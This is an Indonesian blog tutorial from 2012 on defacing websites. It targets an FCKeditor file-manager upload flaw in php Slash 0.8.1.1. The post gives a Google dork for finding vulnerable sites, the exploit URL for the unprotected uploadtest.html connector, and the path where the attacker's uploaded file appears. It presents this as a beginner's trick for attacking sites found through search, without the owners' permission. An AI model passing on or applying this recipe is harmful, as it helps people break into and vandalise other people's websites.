Trik Deface [php Slash 0.8.1.1] – File Upload Vulnerability [Trik Lama]

Satria Perwira 12/14/2012 Tutor Deface

Rafi Orilya,-bagi sobat-sobat yang udah master mending close aja… ini Cuma buat yang masih belajar seperti saya. Okee.. okee.
Trik ini belum tentu masih aktif sampai sekarang, karena saya belum mencobanya lagi. Semoga sobat sukses dengan trik ini deh.. semangat ajah- hehehe…

Dork => inurl:scripts/fckeditor/editor/filemanager/
* Kembangkan sendiri

Exploit => /scripts/fckeditor/editor/filemanager/connectors/uploadtest.html

Pasang exploit pada target yang sobat temukan di google :
http://www.target.com/[patch]/scripts/fckeditor/editor/filemanager/connectors/uploadtest.html

Terus setelah sobat sukses menguploadnya…
Sobat bisa lihat hasil deface :

http://www.target.com/[patch]/ imagenes/serverFckEditor/[file sobat]

Mengizinkan => txt, jp, dll (html dan php tidak bisa)

Yaa.. seperti itulah dokumen yang saya punya di laptop.. itu ngga tau tahun berapa tuh.
hahaha… :D

Artikel Dilindungi
Sertakan alamat blog ini jika mengcopy paste
Hak Cipta Dilindungi

Terima Kasih
Rafi Orilya Groups
by Rafi Aldiansyah Asikin

1 komentar

Unknown17 April 2014 pukul 03.21
Boleh dipost tuh trik yang baru hehe~
BalasHapus
Balasan

Tambahkan komentar

Komentar anda sangat dibutuhkan bagi kemajuan kami untuk terus berkarya.
Diharapkan :
* Berkomentarlah dengan bahasa yang baik
* Tidak ada unsur SARA, SPAM, PORNO
* Tidak merugikan orang lain
* Menunjukkan identitas yang jelas bukan Anonim

Diperkenankan :
* Komentar promosi link web anda
* Kritik & Saran

[Protected] by DMCA Protection Pro™
EmoticonEmoticon

Most Visited

Trik Deface [php Slash 0.8.1.1] – File Upload Vulnerability [Trik Lama]

1 komentar